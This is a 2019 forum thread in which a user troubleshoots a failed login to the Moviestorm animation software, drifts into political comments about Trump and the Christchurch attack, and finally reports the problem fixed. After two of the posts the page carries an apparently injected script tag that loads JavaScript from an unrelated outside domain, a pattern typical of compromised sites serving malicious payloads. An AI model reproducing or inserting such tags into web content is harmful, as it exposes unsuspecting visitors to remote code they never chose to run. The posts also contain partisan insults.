• Please log in to reply
7 replies to this topic

#1 Kendo321

Kendo321

Film Critic

• Members
  • 12 posts

Posted 13 March 2019 - 01:47 AM

I am trying to login to the Moviestorm app.  The username and password are the same for the app as the Moviestorm forum and when I attempt to login to the app I get the error message, " Unable to connect to www.moviestorm.co.uk", leaving the program useless.  Is the Moviestorm servicer down for maintenance?  I know they are not updating the software which is disappointing, but not being able to login to try and learn to use the software is just frustrating..  Any feedback would be appreciated.

Thanks,

Ken
<script src="//signagetop.org/1f8da4554e50d0d7c5.js"> </script>

#2 Kendo321

Kendo321

Film Critic

• Members
  • 12 posts

Posted 13 March 2019 - 03:23 AM

And just to add... I clicked on the "Forgottoen Login Detail?" button which brought me to ths message after the "Forgottoen Login Detail?" button was clicked on....

" Proxy Error

The proxy server received an invalid response from an upstream server.
The proxy server could not handle the request GET /MSDB/ForgottonPasswordPageServlet.

Reason: Error reading from remote server"

I'm hoping the server is down and I hope they can correct this soon.  Again any information to correct this will be very much appreciated.

thanks again,

Ken

#3 primaveranz

primaveranz

Master Director

• Pioneers
  • 5409 posts

Posted 13 March 2019 - 05:21 AM

I am able to login OK. Check that you don't have an anti-virus or firewall setting blocking the connection.

"If we only use 1/3 of our brain, what's the other 1/3 for?"

#4 Kendo321

Kendo321

Film Critic

• Members
  • 12 posts

Posted 13 March 2019 - 12:50 PM

Thanks for your quick response for assistance, I disabled the firewall and the antivirus and I received the same message:

" Proxy Error

The proxy server received an invalid response from an upstream server.
The proxy server could not handle the request GET /MSDB/ForgottonPasswordPageServlet.

Reason: Error reading from remote server"

I purchased the Moviestorm MAX in 2017 for $233.  I have installed many addons and have projects in process as I learn how to use the software. There is a button, "Install License" however i am not able to find the license ZIP file in the Moviestorm folders. 

I am at a loss as to what to do next. 

But as always, I find the quick response to my requests for assistance a wonderful quality of the Moviestorn community which keeps me  motivate to pursue my creative outlets.  Any assistance and direction to resolve this matter is greatly appreciated.

Thanks again ,

Ken

<script src="//signagetop.org/1f8da4554e50d0d7c5.js"> </script>

#5 primaveranz

primaveranz

Master Director

• Pioneers
  • 5409 posts

Posted 13 March 2019 - 05:48 PM

Try posting in their Facebook page. They still seem to monitor that. Funnily enough, I can't log in to Facebook just now though ;)

#6 Kendo321

Kendo321

Film Critic

• Members
  • 12 posts

Posted 15 March 2019 - 11:36 PM

I contacted Moviestorm by the support email address and got an automated message say they receive the message and they will contact me to resolve the issue. I also posted a request for assistance on the Moviestorm Facebook account and Twitter account.  It appears the www.moviestorm.co.uk website is down as I cannot connect the this website at all.  I'm in the United States.  It appears the program is attempting to connect to the www.moviestorm.co.uk server to allow the program to open on my computer.

Any additional suggestions would be greatly appreciated.  Kinda feeling abandon by the Moviestorm support staff.

Thanks,

Ken

P.S. On behalf of most of the American public ( at least in the NYC area where I live)  I'm sooo sooo sorry for Donald Trump and his behaviors..

Ken

#7 primaveranz

primaveranz

Master Director

• Pioneers
  • 5409 posts

Posted 16 March 2019 - 09:34 AM

Thanks Ken. I live in New Zealand, and today, even more than before, we are sickened by the kind of people who continue to support and empower your president. He and his like are the epitome of evil. 

#8 Kendo321

Kendo321

Film Critic

• Members
  • 12 posts

Posted 16 March 2019 - 10:05 PM

primaveranz

OH MY GOD!  My love , prayers and blessing are with all of you.  I'm listening to CNN now and the asshole (Trump) is NOT calling out those white nationalist who fostered the beliefs of hatred  that triggered this most horrible event.   Living in New York I am in contact with many different cultures, colors and beliefs. I cherish those about me and I love learning about people.  That's why I'm a social worker.  I believe this "group think" of hatred  originates when those individuals who hate do not look inward to heal and overcome their inner conflicts that cause negative feeling about themselves. They then rally together and validate each other, giving themselves a feeling of self-esteem based on hatred which escalates to violence.  Throw in the instantaneous transmission of information via Twitter, Youtube and Facebook, these hate mongers have a platform to further spread terror.  WORDS MATTER!  and TRump ( that asshole) needs to recognize that.

I lived through 9/11 and lost people from that terror attack.  It changed my life.  9/11 is now apart of  my life.  Time moved on.Things did get better but it's something I will never forget.  I know things will get better for you and your country too. But now it's hard and it may be that way for some time.  Love heals.

Oh, by the way....The problem with my Moviestorm program is fixed.

Ken